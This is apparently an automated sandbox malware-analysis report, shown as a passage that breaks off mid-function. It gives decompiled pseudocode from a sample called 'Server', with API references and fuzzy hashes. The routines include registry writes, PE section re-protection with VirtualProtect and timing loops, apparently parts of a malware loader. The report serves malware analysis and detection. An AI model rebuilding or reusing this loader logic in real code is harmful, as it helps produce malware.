            			E02025251(void* __edx) {
            				void* _v8;
            				int _v12;
            				WCHAR* _v16;
            				void* __edi;
            				void* __esi;
            				void* _t23;
            				intOrPtr _t24;
            				void* _t26;
            				intOrPtr _t32;
            				intOrPtr _t35;
            				void* _t37;
            				intOrPtr _t38;
            				intOrPtr _t42;
            				void* _t45;
            				void* _t50;
            				void* _t52;
            
            				_t50 = __edx;
            				_v12 = 0;
            				_t23 = E02026ADC(0,  &_v8); // executed
            				if(_t23 != 0) {
            					_v8 = 0;
            				}
            				_t24 =  *0x202a348; // 0xc7d5a8
            				_t4 = _t24 + 0x202bc70; // 0x2ca9218
            				_t5 = _t24 + 0x202bb60; // 0x4f0053
            				_t26 = E020233F1( &_v16, _v8, _t5, _t4); // executed
            				_t45 = _t26;
            				if(_t45 == 0) {
            					StrToIntExW(_v16, 0,  &_v12);
            					_t45 = 8;
            					if(_v12 < _t45) {
            						_t45 = 1;
            						__eflags = 1;
            					} else {
            						_t32 =  *0x202a348; // 0xc7d5a8
            						_t11 = _t32 + 0x202bcc8; // 0x2ca9270
            						_t48 = _t11;
            						_t12 = _t32 + 0x202bb60; // 0x4f0053
            						_t52 = E02025DE4(_t11, _t12, _t11);
            						_t59 = _t52;
            						if(_t52 != 0) {
            							_t35 =  *0x202a348; // 0xc7d5a8
            							_t13 = _t35 + 0x202bcf0; // 0x30314549
            							_t37 = E02025157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
            							if(_t37 == 0) {
            								_t61 =  *0x202a2fc - 6;
            								if( *0x202a2fc <= 6) {
            									_t42 =  *0x202a348; // 0xc7d5a8
            									_t15 = _t42 + 0x202bcd2; // 0x52384549
            									E02025157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
            								}
            							}
            							_t38 =  *0x202a348; // 0xc7d5a8
            							_t17 = _t38 + 0x202bbb8; // 0x2ca9160
            							_t18 = _t38 + 0x202bc1c; // 0x680043
            							_t45 = E02025B0E(_v8, 0x80000001, _t52, _t18, _t17);
            							HeapFree( *0x202a2d8, 0, _t52);
            						}
            					}
            					HeapFree( *0x202a2d8, 0, _v16);
            				}
            				_t54 = _v8;
            				if(_v8 != 0) {
            					E02027220(_t54);
            				}
            				return _t45;
            			}



















            0x02025251
            0x02025261
            0x02025264
            0x0202526b
            0x0202526d
            0x0202526d
            0x02025270
            0x02025275
            0x0202527c
            0x02025289
            0x0202528e
            0x02025292
            0x020252a0
            0x020252ae
            0x020252b2
            0x02025343
            0x02025343
            0x020252b8
            0x020252b8
            0x020252bd
            0x020252bd
            0x020252c4
            0x020252d0
            0x020252d2
            0x020252d4
            0x020252d6
            0x020252dd
            0x020252e8
            0x020252ef
            0x020252f1
            0x020252f8
            0x020252fa
            0x02025301
            0x0202530c
            0x0202530c
            0x020252f8
            0x02025311
            0x02025316
            0x0202531d
            0x0202533b
            0x0202533d
            0x0202533d
            0x020252d4
            0x0202534f
            0x0202534f
            0x02025351
            0x02025356
            0x02025358
            0x02025358
            0x02025363

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02CA9218,00000000,?,746AF710,00000000,746AF730), ref: 020252A0
            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02CA9160,?,00000000,30314549,00000014,004F0053,02CA9270), ref: 0202533D
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,020268B6), ref: 0202534F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: c38f373a996aefaa3433c035f100d851eaac0d63a39cdd96d991cbf042a1fc90
            • Instruction ID: 0284da54577ea1b80787fe8e191cf0ce825f5245a01e39cb81578e1b16aac4b5
            • Opcode Fuzzy Hash: c38f373a996aefaa3433c035f100d851eaac0d63a39cdd96d991cbf042a1fc90
            • Instruction Fuzzy Hash: C9318C31A00328AFDB219B95DDC4EEA7BBDEB08704F660067B504AB120DB709A5CEB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(80000002), ref: 020243B5
            • SysAllocString.OLEAUT32(02024D42), ref: 020243F9
            • SysFreeString.OLEAUT32(00000000), ref: 0202440D
            • SysFreeString.OLEAUT32(00000000), ref: 0202441B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 88ec0f0a233111e4c05d4d7f35d399ee7f9b61025401e5dde1f38831ef5ea02b
            • Instruction ID: ab7d5c0d41dbae38818b1a7702c47afb153eda5e5c660483c8a135d6be33ca7c
            • Opcode Fuzzy Hash: 88ec0f0a233111e4c05d4d7f35d399ee7f9b61025401e5dde1f38831ef5ea02b
            • Instruction Fuzzy Hash: 87310C75900359AFCB15DF98D4C09EE7BB5FF48304B21882BF90697250D7749689CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E0202213E(void* __ecx, intOrPtr _a4) {
            				struct _FILETIME _v12;
            				int _t13;
            				signed int _t16;
            				void* _t17;
            				signed int _t18;
            				unsigned int _t22;
            				void* _t30;
            				signed int _t34;
            
            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
            				asm("stosd");
            				do {
            					_t13 = SwitchToThread();
            					GetSystemTimeAsFileTime( &_v12);
            					_t22 = _v12.dwHighDateTime;
            					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
            					_push(0);
            					_push(0x13);
            					_push(_t22 >> 5);
            					_push(_t16);
            					L02028436();
            					_t34 = _t16 + _t13;
            					_t17 = E02026269(_a4, _t34);
            					_t30 = _t17;
            					_t18 = 3;
            					Sleep(_t18 << (_t34 & 0x00000007)); // executed
            				} while (_t30 == 1);
            				return _t30;
            			}











            0x02022143
            0x0202214e
            0x0202214f
            0x0202214f
            0x0202215b
            0x02022164
            0x02022167
            0x0202216b
            0x0202216d
            0x02022172
            0x02022173
            0x02022174
            0x0202217e
            0x02022181
            0x02022188
            0x0202218c
            0x02022193
            0x02022199
            0x020221a3

            APIs
            • SwitchToThread.KERNEL32(?,00000001,?,?,?,02025044,?,?), ref: 0202214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02025044,?,?), ref: 0202215B
            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02022174
              • Part of subcall function 02026269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02026308
            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02025044,?,?), ref: 02022193
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
            • String ID:
            • API String ID: 1610602887-0
            • Opcode ID: 4593e53ec9a56792c718fabf7748dd72e96c58ba8ed117b196cae3ba88764dbc
            • Instruction ID: 2b894f23abee965f91978a5ecd9237d42bd66b1b58eaaff2c6d4ec07f6ab3228
            • Opcode Fuzzy Hash: 4593e53ec9a56792c718fabf7748dd72e96c58ba8ed117b196cae3ba88764dbc
            • Instruction Fuzzy Hash: DFF08176E403187BD7149AA4CC5DFDE76B9EB84361F210525EA01E7240EAB89A098AA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02025157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
            				struct _FILETIME _v12;
            				void* _t11;
            				short _t19;
            				void* _t21;
            				void* _t22;
            				void* _t24;
            				void* _t25;
            				short* _t26;
            
            				_t24 = __edx;
            				_t25 = E02026536(_t11, _a12);
            				if(_t25 == 0) {
            					_t22 = 8;
            				} else {
            					_t26 = _t25 + _a16 * 2;
            					 *_t26 = 0;
            					_t22 = E0202330E(__ecx, _a4, _a8, _t25);
            					if(_t22 == 0) {
            						GetSystemTimeAsFileTime( &_v12);
            						_t19 = 0x5f;
            						 *_t26 = _t19;
            						_t21 = E02027767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
            						_t22 = _t21;
            					}
            					HeapFree( *0x202a2d8, 0, _t25);
            				}
            				return _t22;
            			}











            0x02025157
            0x02025168
            0x0202516c
            0x020251c7
            0x0202516e
            0x02025175
            0x0202517d
            0x02025185
            0x02025189
            0x0202518f
            0x02025197
            0x0202519a
            0x020251ad
            0x020251b2
            0x020251b2
            0x020251bd
            0x020251bd
            0x020251ce

            APIs
              • Part of subcall function 02026536: lstrlen.KERNEL32(?,00000000,02CA9E18,00000000,02026F0A,02CAA03B,43175AC3,?,?,?,?,43175AC3,00000005,0202A00C,4D283A53,?), ref: 0202653D
              • Part of subcall function 02026536: mbstowcs.NTDLL ref: 02026566
              • Part of subcall function 02026536: memset.NTDLL ref: 02026578
            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,02CA9270), ref: 0202518F
            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,02CA9270), ref: 020251BD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
            • String ID: Uet
            • API String ID: 1500278894-2766386878
            • Opcode ID: e17b636f808c44510e62bf9eb5018e0ca911fa00655e6c7e0be42118099f5eec
            • Instruction ID: 1045ce23ea28f217a4c6c6c9ed546c30687f6c07ffac7c1dc09ebde34d102ec9
            • Opcode Fuzzy Hash: e17b636f808c44510e62bf9eb5018e0ca911fa00655e6c7e0be42118099f5eec
            • Instruction Fuzzy Hash: B101B132640319BBDB215F949C84E9A3FB9FF84714F600427FA009A160DA72C928DB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				long _v20;
            				int _t42;
            				long _t53;
            				intOrPtr _t56;
            				void* _t57;
            				signed int _t59;
            
            				_v12 = _v12 & 0x00000000;
            				_t56 =  *0x404180;
            				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
            				_v16 =  *(__eax + 6) & 0x0000ffff;
            				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
            				_v8 = _v8 & 0x00000000;
            				if(_v16 <= 0) {
            					L12:
            					return _v12;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t59 = _v12;
            					if(_t59 != 0) {
            						goto L12;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						asm("bt [esi+0x24], eax");
            						if(__eflags >= 0) {
            							L8:
            							_t53 = _t56 - 0x43175abf;
            							L9:
            							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
            							if(_t42 == 0) {
            								_v12 = GetLastError();
            							}
            							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
            							_v8 = _v8 + 1;
            							if(_v8 < _v16) {
            								continue;
            							} else {
            								goto L12;
            							}
            						}
            						asm("bt [esi+0x24], eax");
            						_t53 = _t56 - 0x43175ac1;
            						if(__eflags >= 0) {
            							goto L9;
            						}
            						goto L8;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						_t53 = _t56 - 0x43175aa3;
            					} else {
            						_t53 = _t56 - 0x43175a83;
            					}
            					goto L9;
            				}
            				goto L12;
            			}












            0x004014d9
            0x004014e6
            0x004014ec
            0x004014f8
            0x00401508
            0x0040150a
            0x00401512
            0x004015a6
            0x004015ad
            0x00000000
            0x00000000
            0x00000000
            0x00401518
            0x00401518
            0x00401518
            0x0040151c
            0x00000000
            0x00000000
            0x00401528
            0x0040152c
            0x00401550
            0x00401554
            0x00401568
            0x00401568
            0x0040156e
            0x0040157d
            0x00401581
            0x00401589
            0x00401589
            0x00401595
            0x00401597
            0x004015a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004015a0
            0x0040155c
            0x00401560
            0x00401566
            0x00000000
            0x00000000
            0x00000000
            0x00401566
            0x00401534
            0x00401538
            0x00401542
            0x0040153a
            0x0040153a
            0x0040153a
            0x00000000
            0x00401538
            0x00000000

            APIs
            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E020212C6(char* _a4, char** _a8) {
            				char* _t7;
            				char* _t11;
            				char* _t14;
            				char* _t16;
            				char* _t17;
            				char _t18;
            				signed int _t20;
            				signed int _t22;
            
            				_t16 = _a4;
            				_push(0x20);
            				_t20 = 1;
            				_push(_t16);
            				while(1) {
            					_t7 = StrChrA();
            					if(_t7 == 0) {
            						break;
            					}
            					_t20 = _t20 + 1;
            					_push(0x20);
            					_push( &(_t7[1]));
            				}
            				_t11 = E020233DC(_t20 << 2);
            				_a4 = _t11;
            				if(_t11 != 0) {
            					StrTrimA(_t16, 0x2029278); // executed
            					_t22 = 0;
            					do {
            						_t14 = StrChrA(_t16, 0x20);
            						if(_t14 != 0) {
            							 *_t14 = 0;
            							do {
            								_t14 =  &(_t14[1]);
            								_t18 =  *_t14;
            							} while (_t18 == 0x20 || _t18 == 9);
            						}
            						_t17 = _a4;
            						 *(_t17 + _t22 * 4) = _t16;
            						_t22 = _t22 + 1;
            						_t16 = _t14;
            					} while (_t14 != 0);
            					 *_a8 = _t17;
            				}
            				return 0;
            			}











            0x020212ca
            0x020212d7
            0x020212d9
            0x020212da
            0x020212e2
            0x020212e2
            0x020212e6
            0x00000000
            0x00000000
            0x020212dd
            0x020212de
            0x020212e1
            0x020212e1
            0x020212ee
            0x020212f3
            0x020212f8
            0x02021300
            0x02021306
            0x02021308
            0x0202130b
            0x0202130f
            0x02021311
            0x02021314
            0x02021314
            0x02021315
            0x02021317
            0x02021314
            0x02021321
            0x02021324
            0x02021327
            0x02021328
            0x0202132a
            0x02021331
            0x02021331
            0x0202133d

            APIs
            • StrChrA.SHLWAPI(?,00000020,00000000,02CA95FC,?,?,020253AF,?,02CA95FC), ref: 020212E2
            • StrTrimA.KERNELBASE(?,02029278,00000002,?,020253AF,?,02CA95FC), ref: 02021300
            • StrChrA.SHLWAPI(?,00000020,?,020253AF,?,02CA95FC), ref: 0202130B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Trim
            • String ID:
            • API String ID: 3043112668-0
            • Opcode ID: 6faf47d0fec594af0b9cb9aa4f4bb99db683d4927b7aa3086aff6f7e57afd533
            • Instruction ID: 092c7842fd9e0ae606b0a0a46f6d4af234d0c0a319830bfec5e7e8a0a1dbb3bc
            • Opcode Fuzzy Hash: 6faf47d0fec594af0b9cb9aa4f4bb99db683d4927b7aa3086aff6f7e57afd533
            • Instruction Fuzzy Hash: BE01B17170036A6EEB214A6ACD84FABBBCEEB85254F140053B959CB282DA70C849D660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020261DA(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x202a2d8, 0, _a4); // executed
            				return _t2;
            			}




            0x020261e6
            0x020261ec

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: 81af4e326d4fdfc4e1a957f10f847a76cd040d5acda1482ad7c0a7335b846587
            • Instruction ID: 274debdaecd3671c37896b5ed79f8a948a2e61248c3274b80b4a9880e5471b22
            • Opcode Fuzzy Hash: 81af4e326d4fdfc4e1a957f10f847a76cd040d5acda1482ad7c0a7335b846587
            • Instruction Fuzzy Hash: AEB01271A80304AFCB314B00DE04F057A21B750B00F324812B30C0007086360438FB15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E0202790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
            				void* _v8;
            				void* __esi;
            				intOrPtr* _t35;
            				void* _t40;
            				intOrPtr* _t41;
            				intOrPtr* _t43;
            				intOrPtr* _t45;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				void* _t54;
            				intOrPtr* _t55;
            				intOrPtr* _t57;
            				intOrPtr* _t61;
            				intOrPtr* _t65;
            				intOrPtr _t68;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            
            				_t55 = _a4;
            				_t35 =  *((intOrPtr*)(_t55 + 4));
            				_a4 = 0;
            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
            				if(_t76 < 0) {
            					L18:
            					return _t76;
            				}
            				_t40 = E02024358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
            				_t76 = _t40;
            				if(_t76 >= 0) {
            					_t61 = _a28;
            					if(_t61 != 0 &&  *_t61 != 0) {
            						_t52 = _v8;
            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
            					}
            					if(_t76 >= 0) {
            						_t43 =  *_t55;
            						_t68 =  *0x202a348; // 0xc7d5a8
            						_t20 = _t68 + 0x202b270; // 0x740053
            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
            						if(_t76 >= 0) {
            							_t76 = E02024984(_a4);
            							if(_t76 >= 0) {
            								_t65 = _a28;
            								if(_t65 != 0 &&  *_t65 == 0) {
            									_t50 = _a4;
            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
            								}
            							}
            						}
            						_t45 = _a4;
            						if(_t45 != 0) {
            							 *((intOrPtr*)( *_t45 + 8))(_t45);
            						}
            						_t57 = __imp__#6;
            						if(_a20 != 0) {
            							 *_t57(_a20);
            						}
            						if(_a12 != 0) {
            							 *_t57(_a12);
            						}
            					}
            				}
            				_t41 = _v8;
            				 *((intOrPtr*)( *_t41 + 8))(_t41);
            				goto L18;
            			}





















            0x02027911
            0x02027914
            0x02027924
            0x0202792d
            0x02027931
            0x020279ff
            0x02027a05
            0x02027a05
            0x0202794b
            0x02027950
            0x02027954
            0x0202795a
            0x0202795f
            0x02027966
            0x02027975
            0x02027975
            0x02027979
            0x0202797b
            0x02027987
            0x02027992
            0x0202799d
            0x020279a1
            0x020279ab
            0x020279af
            0x020279b1
            0x020279b6
            0x020279bd
            0x020279cd
            0x020279cd
            0x020279b6
            0x020279af
            0x020279cf
            0x020279d4
            0x020279d9
            0x020279d9
            0x020279dc
            0x020279e5
            0x020279ea
            0x020279ea
            0x020279ef
            0x020279f4
            0x020279f4
            0x020279ef
            0x02027979
            0x020279f6
            0x020279fc
            0x00000000

            APIs
              • Part of subcall function 02024358: SysAllocString.OLEAUT32(80000002), ref: 020243B5
              • Part of subcall function 02024358: SysFreeString.OLEAUT32(00000000), ref: 0202441B
            • SysFreeString.OLEAUT32(?), ref: 020279EA
            • SysFreeString.OLEAUT32(02024D42), ref: 020279F4
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$Free$Alloc
            • String ID:
            • API String ID: 986138563-0
            • Opcode ID: f9682a0a7d10903777dc11b91181e2af023d810c88999990c401edf9adc779c8
            • Instruction ID: c020f7144d2cc7394ced62203080356fd92657dee1573e22f9ae9b7eaa46fc39
            • Opcode Fuzzy Hash: f9682a0a7d10903777dc11b91181e2af023d810c88999990c401edf9adc779c8
            • Instruction Fuzzy Hash: A6315D72500359AFCF22DF68C888C9BBBBAFBCD744714465AF805AB220D7319D55DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040139F() {
            				char _v16;
            				intOrPtr _v28;
            				void _v32;
            				void* _v36;
            				intOrPtr _t15;
            				void* _t16;
            				void* _t24;
            				long _t25;
            				int _t26;
            				void* _t30;
            				intOrPtr* _t32;
            				signed int _t35;
            				intOrPtr _t38;
            
            				_t15 =  *0x404184;
            				if( *0x40416c > 5) {
            					_t16 = _t15 + 0x40513c;
            				} else {
            					_t16 = _t15 + 0x40529c;
            				}
            				E00401D3C(_t16, _t16);
            				_t35 = 6;
            				memset( &_v32, 0, _t35 << 2);
            				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
            				if(_t24 == 0) {
            					_t25 = 0xb;
            				} else {
            					_t26 = lstrlenW( *0x404178);
            					_t8 = _t26 + 2; // 0x2
            					_t11 = _t26 + _t8 + 8; // 0xa
            					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
            					if(_t30 == 0) {
            						_t32 = _v36;
            						 *_t32 = 0;
            						if( *0x404178 == 0) {
            							 *((short*)(_t32 + 4)) = 0;
            						} else {
            							L00401FE6(_t32 + 4);
            						}
            					}
            					_t25 = E004012FB(_v28); // executed
            				}
            				ExitThread(_t25);
            			}
















            0x004013a5
            0x004013b6
            0x004013c0
            0x004013b8
            0x004013b8
            0x004013b8
            0x004013c7
            0x004013d0
            0x004013d5
            0x004013ec
            0x004013f3
            0x00401450
            0x004013f5
            0x004013fb
            0x00401401
            0x0040140f
            0x00401413
            0x0040141a
            0x00401422
            0x00401426
            0x0040142e
            0x0040143f
            0x00401430
            0x00401436
            0x00401436
            0x0040142e
            0x00401447
            0x00401447
            0x00401452

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0
            • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
            • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 020232AB
              • Part of subcall function 0202790B: SysFreeString.OLEAUT32(?), ref: 020279EA
            • SafeArrayDestroy.OLEAUT32(?), ref: 020232FB
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ArraySafe$CreateDestroyFreeString
            • String ID:
            • API String ID: 3098518882-0
            • Opcode ID: 2b723b2e8f10c36faa6b3bc0edb606cba96f06003dcac5351a406d1392abf1bd
            • Instruction ID: 27bdcdc302576ee58688974ecfc77b31fe88680425a44631de195396bd3cc09d
            • Opcode Fuzzy Hash: 2b723b2e8f10c36faa6b3bc0edb606cba96f06003dcac5351a406d1392abf1bd
            • Instruction Fuzzy Hash: F911703190021DBFDB119FA4CC45AEEBBB9FF48710F014066FA00A7160E7749A199BA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020233F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
            				void* _t21;
            				void* _t22;
